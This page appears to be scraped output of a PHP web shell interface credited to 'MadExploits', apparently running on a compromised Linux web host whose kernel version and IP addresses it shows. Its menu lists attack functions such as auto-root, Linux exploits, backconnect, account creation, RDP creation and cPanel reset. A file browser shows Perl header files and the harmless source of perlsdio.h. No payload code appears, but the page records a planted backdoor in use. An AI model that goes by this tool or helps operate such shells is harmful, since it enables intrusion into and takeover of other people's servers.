Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.14.145.167
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib64 /
perl5 /
CORE /
[ HOME SHELL ]
Name
Size
Permission
Action
EXTERN.h
1.77
KB
-rw-r--r--
INTERN.h
1.47
KB
-rw-r--r--
XSUB.h
21.27
KB
-rw-r--r--
av.h
2.91
KB
-rw-r--r--
bitcount.h
850
B
-rw-r--r--
charclass_invlists.h
9.55
KB
-rw-r--r--
config.h
145.13
KB
-rw-r--r--
cop.h
39.64
KB
-rw-r--r--
cv.h
9.22
KB
-rw-r--r--
dosish.h
5.95
KB
-rw-r--r--
embed.h
84.98
KB
-rw-r--r--
embedvar.h
19.08
KB
-rw-r--r--
fakesdio.h
3.24
KB
-rw-r--r--
fakethr.h
1.92
KB
-rw-r--r--
feature.h
3.69
KB
-rw-r--r--
form.h
1.43
KB
-rw-r--r--
git_version.h
357
B
-rw-r--r--
gv.h
10.02
KB
-rw-r--r--
handy.h
53.01
KB
-rw-r--r--
hv.h
23.67
KB
-rw-r--r--
intrpvar.h
27.19
KB
-rw-r--r--
iperlsys.h
47.63
KB
-rw-r--r--
keywords.h
6.45
KB
-rw-r--r--
l1_char_class_tab.h
31.86
KB
-rw-r--r--
libperl.so
1.57
MB
-rwxr-xr-x
malloc_ctl.h
1.48
KB
-rw-r--r--
metaconfig.h
899
B
-rw-r--r--
mg.h
2.37
KB
-rw-r--r--
mg_data.h
4.84
KB
-rw-r--r--
mg_raw.h
4.21
KB
-rw-r--r--
mg_vtable.h
9.14
KB
-rw-r--r--
mydtrace.h
1.81
KB
-rw-r--r--
nostdio.h
3.37
KB
-rw-r--r--
op.h
32.07
KB
-rw-r--r--
op_reg_common.h
4.33
KB
-rw-r--r--
opcode.h
46.2
KB
-rw-r--r--
opnames.h
8.05
KB
-rw-r--r--
overload.h
2.98
KB
-rw-r--r--
pad.h
12.77
KB
-rw-r--r--
parser.h
5.38
KB
-rw-r--r--
patchlevel.h
8.05
KB
-rw-r--r--
perl.h
168.47
KB
-rw-r--r--
perlapi.h
5.34
KB
-rw-r--r--
perldtrace.h
1.77
KB
-rw-r--r--
perlio.h
10.83
KB
-rw-r--r--
perliol.h
13.21
KB
-rw-r--r--
perlsdio.h
4.92
KB
-rw-r--r--
perlsfio.h
2.64
KB
-rw-r--r--
perlvars.h
8.49
KB
-rw-r--r--
perly.h
5.67
KB
-rw-r--r--
pp.h
18.37
KB
-rw-r--r--
pp_proto.h
10.61
KB
-rw-r--r--
proto.h
259.12
KB
-rw-r--r--
reentr.h
79.05
KB
-rw-r--r--
regcharclass.h
30.79
KB
-rw-r--r--
regcomp.h
32.46
KB
-rw-r--r--
regexp.h
28.7
KB
-rw-r--r--
regnodes.h
37.97
KB
-rw-r--r--
scope.h
9.64
KB
-rw-r--r--
sv.h
72.44
KB
-rw-r--r--
thread.h
11.67
KB
-rw-r--r--
time64.h
1.4
KB
-rw-r--r--
time64_config.h
1.98
KB
-rw-r--r--
uconfig.h
144.66
KB
-rw-r--r--
unixish.h
4.48
KB
-rw-r--r--
utf8.h
24.78
KB
-rw-r--r--
utfebcdic.h
34.07
KB
-rw-r--r--
util.h
1.71
KB
-rw-r--r--
uudmap.h
904
B
-rw-r--r--
warnings.h
4.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : perlsdio.h
/* perlsdio.h * * Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, * 2002, 2003, 2006, 2007, 2008 by Larry Wall and others * * You may distribute under the terms of either the GNU General Public * License or the Artistic License, as specified in the README file. * */ #ifdef PERLIO_IS_STDIO #ifdef NETWARE #include "nwstdio.h" #else /* * This file #define-s the PerlIO_xxx abstraction onto stdio functions. * Make this as close to original stdio as possible. */ #define PerlIO FILE #define PerlIO_stderr() PerlSIO_stderr #define PerlIO_stdout() PerlSIO_stdout #define PerlIO_stdin() PerlSIO_stdin #define PerlIO_isutf8(f) 0 #define PerlIO_printf PerlSIO_printf #define PerlIO_stdoutf PerlSIO_stdoutf #define PerlIO_vprintf(f,fmt,a) PerlSIO_vprintf(f,fmt,a) #define PerlIO_write(f,buf,count) PerlSIO_fwrite(buf,1,count,f) #define PerlIO_unread(f,buf,count) (-1) #define PerlIO_open PerlSIO_fopen #define PerlIO_fdopen PerlSIO_fdopen #define PerlIO_reopen PerlSIO_freopen #define PerlIO_close(f) PerlSIO_fclose(f) #define PerlIO_puts(f,s) PerlSIO_fputs(s,f) #define PerlIO_putc(f,c) PerlSIO_fputc(c,f) #if defined(VMS) # if defined(__DECC) /* Unusual definition of ungetc() here to accommodate fast_sv_gets()' * belief that it can mix getc/ungetc with reads from stdio buffer */ int decc$ungetc(int __c, FILE *__stream); # define PerlIO_ungetc(f,c) ((c) == EOF ? EOF : \ ((*(f) && !((*(f))->_flag & _IONBF) && \ ((*(f))->_ptr > (*(f))->_base)) ? \ ((*(f))->_cnt++, *(--(*(f))->_ptr) = (c)) : decc$ungetc(c,f))) # else # define PerlIO_ungetc(f,c) ungetc(c,f) # endif /* Work around bug in DECCRTL/AXP (DECC v5.x) and some versions of old * VAXCRTL which causes read from a pipe after EOF has been returned * once to hang. */ # define PerlIO_getc(f) \ (feof(f) ? EOF : getc(f)) # define PerlIO_read(f,buf,count) \ (feof(f) ? 0 : (SSize_t)fread(buf,1,count,f)) # define PerlIO_tell(f) ftell(f) #else # define PerlIO_getc(f) PerlSIO_fgetc(f) # define PerlIO_ungetc(f,c) PerlSIO_ungetc(c,f) # define PerlIO_read(f,buf,count) (SSize_t)PerlSIO_fread(buf,1,count,f) # define PerlIO_tell(f) PerlSIO_ftell(f) #endif #define PerlIO_eof(f) PerlSIO_feof(f) #define PerlIO_getname(f,b) fgetname(f,b) #define PerlIO_error(f) PerlSIO_ferror(f) #define PerlIO_fileno(f) PerlSIO_fileno(f) #define PerlIO_clearerr(f) PerlSIO_clearerr(f) #define PerlIO_flush(f) PerlSIO_fflush(f) #if defined(VMS) && !defined(__DECC) /* Old VAXC RTL doesn't reset EOF on seek; Perl folk seem to expect this */ #define PerlIO_seek(f,o,w) (((f) && (*f) && ((*f)->_flag &= ~_IOEOF)),fseek(f,o,w)) #else # define PerlIO_seek(f,o,w) PerlSIO_fseek(f,o,w) #endif #define PerlIO_rewind(f) PerlSIO_rewind(f) #define PerlIO_tmpfile() PerlSIO_tmpfile() #define PerlIO_importFILE(f,fl) (f) #define PerlIO_exportFILE(f,fl) (f) #define PerlIO_findFILE(f) (f) #define PerlIO_releaseFILE(p,f) ((void) 0) #ifdef HAS_SETLINEBUF #define PerlIO_setlinebuf(f) PerlSIO_setlinebuf(f); #else #define PerlIO_setlinebuf(f) PerlSIO_setvbuf(f, NULL, _IOLBF, 0); #endif /* Now our interface to Configure's FILE_xxx macros */ #ifdef USE_STDIO_PTR #define PerlIO_has_cntptr(f) 1 #define PerlIO_get_ptr(f) PerlSIO_get_ptr(f) #define PerlIO_get_cnt(f) PerlSIO_get_cnt(f) #ifdef STDIO_CNT_LVALUE #define PerlIO_canset_cnt(f) 1 #define PerlIO_set_cnt(f,c) PerlSIO_set_cnt(f,c) #ifdef STDIO_PTR_LVALUE #ifdef STDIO_PTR_LVAL_NOCHANGE_CNT #define PerlIO_fast_gets(f) 1 #endif #endif /* STDIO_PTR_LVALUE */ #else /* STDIO_CNT_LVALUE */ #define PerlIO_canset_cnt(f) 0 #define PerlIO_set_cnt(f,c) abort() #endif #ifdef STDIO_PTR_LVALUE #ifdef STDIO_PTR_LVAL_NOCHANGE_CNT #define PerlIO_set_ptrcnt(f,p,c) STMT_START {PerlSIO_set_ptr(f,p), PerlIO_set_cnt(f,c);} STMT_END #else #ifdef STDIO_PTR_LVAL_SETS_CNT /* assert() may pre-process to ""; potential syntax error (FILE_ptr(), ) */ #define PerlIO_set_ptrcnt(f,p,c) STMT_START {PerlSIO_set_ptr(f,p); assert(PerlSIO_get_cnt(f) == (c));} STMT_END #define PerlIO_fast_gets(f) 1 #else #define PerlIO_set_ptrcnt(f,p,c) abort() #endif #endif #endif #else /* USE_STDIO_PTR */ #define PerlIO_has_cntptr(f) 0 #define PerlIO_canset_cnt(f) 0 #define PerlIO_get_cnt(f) (abort(),0) #define PerlIO_get_ptr(f) (abort(),(void *)0) #define PerlIO_set_cnt(f,c) abort() #define PerlIO_set_ptrcnt(f,p,c) abort() #endif /* USE_STDIO_PTR */ #ifndef PerlIO_fast_gets #define PerlIO_fast_gets(f) 0 #endif #ifdef FILE_base #define PerlIO_has_base(f) 1 #define PerlIO_get_base(f) PerlSIO_get_base(f) #define PerlIO_get_bufsiz(f) PerlSIO_get_bufsiz(f) #else #define PerlIO_has_base(f) 0 #define PerlIO_get_base(f) (abort(),(void *)0) #define PerlIO_get_bufsiz(f) (abort(),0) #endif #endif /* NETWARE */ #endif /* PERLIO_IS_STDIO */ /* * Local variables: * c-indentation-style: bsd * c-basic-offset: 4 * indent-tabs-mode: t * End: * * ex: set ts=8 sts=4 sw=4 noet: */
Close